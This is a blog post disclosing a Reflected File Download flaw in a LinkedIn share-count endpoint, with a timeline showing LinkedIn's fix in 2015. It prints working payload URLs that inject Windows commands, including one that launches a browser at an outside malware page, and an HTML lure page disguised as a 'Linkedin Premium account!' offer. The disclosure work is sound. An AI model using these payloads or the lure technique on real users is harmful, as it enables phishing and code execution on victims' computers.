When researching another website I discovered a XHR request on my Google Inspector on Linkedin that seemed interesting:
https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt
Basically it was the request made by websites to count how many shares their site have on Linkedin network.
As a curious security researcher I tried to modify the url parameter to something more interesting:
https://www.linkedin.com/countserv/count/share?url=”||calc||
Which returned:
IN.Tags.Share.handleCount({“count”:0,”fCnt”:”0″,”fCntPlusOne”:”1″,”url”:”\”||calc||”});
Url parameter wasn’t validated and it was reflected on the JSON file.
If I downloaded the file and renamed it to .bat it executed the calculator from Windows.
But this is not enough I needed to change the path so it downloads a batch file and use a different windows command.
https://www.linkedin.com/countserv/count/share;setup.bat?url=”||start chrome websegura.net/malware.htm||
Guess what? IE8 downloaded automatically this batch file from a trusted domain – linkedin.com
I wanted to work with other browsers so I needed HTML5 download attribute.
[code language=”html”]
<div align="center">
<a href=’https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||’ download="setup.bat" onclick="return false;">
<img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a>
<h1>Linkedin Premium account!</h1>
<p><i>(Use "Save link as" to download the file)</i></p>
</div>
[/code]
So a possible attack scenario would be:
- 1. Malicious user sends link to victim like it would with a CSRF or a XSS (phishing campaigns, social networks, instant messengers, posts, etc)
- Victim clicks the link and trusting where it came from (Linkedin) he downloads it
- Victim runs the file and his computer it’s hijacked
A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirections vulnerabilities on trusted sites like open redirects on Google or even on Linkedin.
To the victim, the entire process looked like a file is offered for download from Linkedin original site and it would not raise any suspicious. A malicious user could gain complete control over a victims computer system and launch malicious files that appear to originate from a trusted party.
Malicious users are always searching for better ways of gaining trust of victims. This could be the right online weapon.
Timeline:
11-05-2015 Sent the report to Linkedin
11-05-2015 Didn’t understand the true nature of the attack
11-05-2015 I replied with more information using other public RFD attacks and Oren Hafif paper about RFD
13-05-2015 Linkedin told me that they’re working in a solution
02-06-2015 I asked for an update
03-06-2015 Linkedin replied that they will give me an update soon
01-07-2015 I asked again for an update
09-09-2015 Linkedin replied that they had fix the issue
18-09-2015 Full disclosure
3 Replies to “Linkedin Reflected Filename Download”